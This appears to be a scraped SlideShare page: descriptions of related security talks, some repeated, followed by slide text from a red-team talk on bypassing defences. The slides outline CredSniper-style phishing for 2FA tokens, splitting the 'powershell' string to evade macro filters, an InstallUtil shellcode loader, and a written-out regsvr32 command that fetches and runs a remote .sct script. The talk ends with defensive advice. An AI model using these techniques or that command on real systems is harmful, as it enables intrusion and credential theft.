This document discusses bypassing authentication mechanisms to gain unauthorized access. It provides tips and tools for bypassing 2-factor authentication on Google, Office 365, and other services. It also discusses exploiting vulnerabilities in VPNs, antivirus software, firewalls and other security tools.
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts: The Underrated Web-Danger
Testing and Exploiting Backup-File Artifacts with BFAC
BFAC Homepage: https://github.com/mazen160
Blog Post: http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
Are you a developer who works with PHP? Then this webinar was made for you.
Even though PHP is a simple and practical language, it is easy to make code with the help of unorthodox solutions, also known as "kludges", that can endanger your website.
In this webinar, Jean will explore some examples of PHP coding done incorrectly. Jean will also show you how badly written code is an invitation for hackers to exploit a website.
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
How and why does SEO spam infect a website? This webinar will discuss what attackers gain from spam campaigns and how to deal with it effectively. We will cover different types of SEO spam and why your website can be a target. You will also learn how to protect your website from these attacks.
Topics include:
- What is SEO spam?
- How does SEO spam infect your website, and why?
- Should you worry if you have a small website?
- How to detect SEO spam.
- How to protect your website against SEO spam.
More webinars at https://sucuri.net/webinars
Anatomy of Java Vulnerabilities - NLJug 2018Steve Poole
Java is everywhere. According to Oracle it’s on 3 billion devices and counting.
We also know that Java is one of the most popular vehicles for delivering malware. But that’s just the plugin right? Well maybe not. Java on the server can be just at risk as the client.
In this talk we’ll cover all aspects of Java Vulnerabilities. We’ll explain why Java has this dubious reputation, what’s being done to address the issues and what you have to do to reduce your exposure. You’ll learn about Java vulnerabilities in general: how they are reported, managed and fixed as well as learning about the specifics of attack vectors and just what a ‘vulnerability’ actually is. With the continuing increase in cybercrime it’s time you knew how to defend your code. With examples and code this talk will help you become more effective in reducing security issues in Java.
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts: The Underrated Web-Danger
Testing and Exploiting Backup-File Artifacts with BFAC
BFAC Homepage: https://github.com/mazen160
Blog Post: http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
Are you a developer who works with PHP? Then this webinar was made for you.
Even though PHP is a simple and practical language, it is easy to make code with the help of unorthodox solutions, also known as "kludges", that can endanger your website.
In this webinar, Jean will explore some examples of PHP coding done incorrectly. Jean will also show you how badly written code is an invitation for hackers to exploit a website.
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
How and why does SEO spam infect a website? This webinar will discuss what attackers gain from spam campaigns and how to deal with it effectively. We will cover different types of SEO spam and why your website can be a target. You will also learn how to protect your website from these attacks.
Topics include:
- What is SEO spam?
- How does SEO spam infect your website, and why?
- Should you worry if you have a small website?
- How to detect SEO spam.
- How to protect your website against SEO spam.
More webinars at https://sucuri.net/webinars
Anatomy of Java Vulnerabilities - NLJug 2018Steve Poole
Java is everywhere. According to Oracle it’s on 3 billion devices and counting.
We also know that Java is one of the most popular vehicles for delivering malware. But that’s just the plugin right? Well maybe not. Java on the server can be just at risk as the client.
In this talk we’ll cover all aspects of Java Vulnerabilities. We’ll explain why Java has this dubious reputation, what’s being done to address the issues and what you have to do to reduce your exposure. You’ll learn about Java vulnerabilities in general: how they are reported, managed and fixed as well as learning about the specifics of attack vectors and just what a ‘vulnerability’ actually is. With the continuing increase in cybercrime it’s time you knew how to defend your code. With examples and code this talk will help you become more effective in reducing security issues in Java.
Humorous discussion presenting some of the kids of risks that face public facing Web sites for corporations ranging from hacking to legal to social media scares. Slides are illustrative in nature and the aim of the talk is more awareness than anything else.
An Introduction To IT Security And Privacy In Libraries & AnywhereBlake Carver
An hour long presentation I gave for LYRASIS. It introduces many topics in security and privacy on the internet and computers and any other type of device with an ip address. IOT Internet of things, browsers, portable devices and more. In this hour I focused on things to train in libraries, security awareness training and other things relevant to people in libraries. Librarians and anyone else in a library. There's a focus on practical ways to secure yourself, browsers and other things. Also some dicussion on privacy
Deja vu Security CEO Adam Cecchetti was invited to present the keynote speech at this year's (sold-out!) Hushcon in Seattle. Rich in humorous anecdotes and practical analysis, Test For Echo explores the relationship between time, ken, and the future of computer security.
Thoughts on Defensive Development for SitecorePINT Inc
Presentation given by Thomas Powell (tpowell@pint.com) and Joe Lima (jlima@port80software.com) - 2-15-2012 covering WebAppSec issues with an emphasis on concerns with the Sitecore CMS platform.
Sorry for any small quirks in slideshare conversion.
This presentation is in English; the announcement (beneath) & talk were in Dutch (NL)
OpenTechTalks | Ethisch hacken met Kali
Overheden, bedrijven en particulieren worden steeds kwetsbaarder voor aanvallen van black hat hackers, criminelen die de lekken in computers uitbuiten voor geldgewin of louter om schade te veroorzaken. Daartegenover staan de white hat hackers: zij testen computersystemen op fouten en dichten de lekken voordat malafide hackers inbreken. Tijl Deneut (UGent/Howest) geeft een overzicht van welke vormen van cybercriminalteit er bestaan en hoe je je ertegen kunt wapenen. De focus ligt op Kali Linux, een besturingssysteem dat honderden beveiligings- en testprogramma's bundelt. Volgende vragen komen aan bod: hoe installeer je Kali Linux? Hoe kun je in een veilige omgeving testen? Is ethisch hacken eigenlijk wel legaal? Algemene IT-kennis is aangewezen. Achteraf drinken we een glas in het café van Vooruit.
Special Topics Day for Engineering Innovation Lecture on CybersecurityMichael Rushanan
This particular presentation covers, at a high level, our national cybersecurity initiative. The content targets prospective high school students and delves into areas of computer science, information systems, and policy.
Things that go bump on the web - Web Application SecurityChristian Heilmann
My talk at the Web Directions North conference in Denver, Colorado. It covers basic technologies and methodologies of attacks of web applications, what we can do against them and a plea for making interfaces more educational about security than scaring users.
The life of breached data and the attack lifecycleJarrod Overson
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
Humorous discussion presenting some of the kids of risks that face public facing Web sites for corporations ranging from hacking to legal to social media scares. Slides are illustrative in nature and the aim of the talk is more awareness than anything else.
An Introduction To IT Security And Privacy In Libraries & AnywhereBlake Carver
An hour long presentation I gave for LYRASIS. It introduces many topics in security and privacy on the internet and computers and any other type of device with an ip address. IOT Internet of things, browsers, portable devices and more. In this hour I focused on things to train in libraries, security awareness training and other things relevant to people in libraries. Librarians and anyone else in a library. There's a focus on practical ways to secure yourself, browsers and other things. Also some dicussion on privacy
Deja vu Security CEO Adam Cecchetti was invited to present the keynote speech at this year's (sold-out!) Hushcon in Seattle. Rich in humorous anecdotes and practical analysis, Test For Echo explores the relationship between time, ken, and the future of computer security.
Thoughts on Defensive Development for SitecorePINT Inc
Presentation given by Thomas Powell (tpowell@pint.com) and Joe Lima (jlima@port80software.com) - 2-15-2012 covering WebAppSec issues with an emphasis on concerns with the Sitecore CMS platform.
Sorry for any small quirks in slideshare conversion.
This presentation is in English; the announcement (beneath) & talk were in Dutch (NL)
OpenTechTalks | Ethisch hacken met Kali
Overheden, bedrijven en particulieren worden steeds kwetsbaarder voor aanvallen van black hat hackers, criminelen die de lekken in computers uitbuiten voor geldgewin of louter om schade te veroorzaken. Daartegenover staan de white hat hackers: zij testen computersystemen op fouten en dichten de lekken voordat malafide hackers inbreken. Tijl Deneut (UGent/Howest) geeft een overzicht van welke vormen van cybercriminalteit er bestaan en hoe je je ertegen kunt wapenen. De focus ligt op Kali Linux, een besturingssysteem dat honderden beveiligings- en testprogramma's bundelt. Volgende vragen komen aan bod: hoe installeer je Kali Linux? Hoe kun je in een veilige omgeving testen? Is ethisch hacken eigenlijk wel legaal? Algemene IT-kennis is aangewezen. Achteraf drinken we een glas in het café van Vooruit.
Special Topics Day for Engineering Innovation Lecture on CybersecurityMichael Rushanan
This particular presentation covers, at a high level, our national cybersecurity initiative. The content targets prospective high school students and delves into areas of computer science, information systems, and policy.
Things that go bump on the web - Web Application SecurityChristian Heilmann
My talk at the Web Directions North conference in Denver, Colorado. It covers basic technologies and methodologies of attacks of web applications, what we can do against them and a plea for making interfaces more educational about security than scaring users.
The life of breached data and the attack lifecycleJarrod Overson
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
3. I like shiny things
Do you find a need to have
multiple twitter followers?
Do you desire clicks on
Facebook?
Do you snort LinkedIn requests
like a bad 80’s bender?
Then…
Do I have a link for you!!!
Truth!
4. How do bad things
happen?
We seem to be in a loop
A very bad loop
Getting angry at questions…
Best AV?
Best DLP?
Best Threat Intel Feed?
Best Firewall?
Patterns and Chiasms
This.. Without the learn.
5. Password example
Most password complexity
requirements are:
>8 Characters
Upper/Lower/Alpha/Num
No Dictionary words
Full of fail
“We cannot fix this because of
compliance!”
Truth!
11. Credsniper… Get
Credsniper.. Now..• Fetch the profile image
• Google Picasa API
• JavaScript XMLHttpRequest()
• Ask nicely for the password
• Behind the scenes, authenticate
• Is 2FA present?
• No? Redirect them to GDoc
agenda
• Doh! 2FA is enabled
• Which type? Extract
information
• Ask for 2FA Token nicely
• Login w/ Username + Password
+ Token
• https://www.slideshare.net/daft
hack/ok-google-how-do-i-red-
team-gsuite
12. Cash Cow Tipping….
Bypass everything..
AV, DLP, Firewalls, etc.
Trivial to do..
More smoke and mirrors
Get previous sessions here:
Tinyurl.com/504extra2
13. It Wont Get Better
Mail Providers Blocking Powershell
Macros
14. Appear to just look for “powershell” in macro
Well…just break up the string
“Obfuscate” Empire Macro
16. • @subTee (Casey Smith) is awesome
• Please, take a moment and follow
• By pulling down InstallUtil-ShellCode.cs and
inserting msvenom (-f csharp) into it
• Compile with the csc.exe tool
• Awesome! Because it does not need a full Visual
Studio Environment
• Walkthrough here:
• http://www.blackhillsinfosec.com/?p=4881
• @subTee here:
• http://subt0x10.blogspot.com/?m=1
InstallUtil-ShellCode.cs
18. Is this some kind of joke? .sct files?/?
Huh? No joke.
19. regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
• Yea… regsvr32 can take a url
• It is Proxy aware
• Uses TLS
• Is a signed MS binary…
• http://subt0x10.blogspot.com/2016/04/bypass-
application-whitelisting-script.html?m=1
.sct… Running it
20. Advanced Endpoint
Security
We are seeing Vision (Hi Dave!!),
Cylance, Bit9 (to a lesser extent),
CrowdStrike, etc. on more tests
Most are train wrecks… Total train wrecks…
White listing is a thing… Get used to it
Smaller organizations doing much better
Larger orgs getting it… Yea, scary…
Do not base purchases on a companies
marketing budget…
21.
22. http://securityweekly.com Copyright 2014
Attacking a VPN
FatPipe
• Found by Joff Thyer
• They have not responded
in months…
• Problem with key reuse
• If the same key is used…
For all installations
• I can steal that key
• And decrypt on the fly
34. http://securityweekly.com Copyright 2014
Stop me
New Fundamentals
• App Locker and SRP
• Long Passwords
• Two Factor Auth
• Firewall Everything
• Internet Whitelisting
• Regularly Test Things
• Assume you will be
compromised.. Plan
Accordingly!!!!
35. http://securityweekly.com Copyright 2014
The RITA Hunt Solution
• Parse Bro Data Sources
• Extract Data of Interest around Network /
Application Sessions
• Use Math and Statistical Methods to Find
Anomalous Activity
• Enable Security Analysts to Visualize and
Identify potential trouble makers.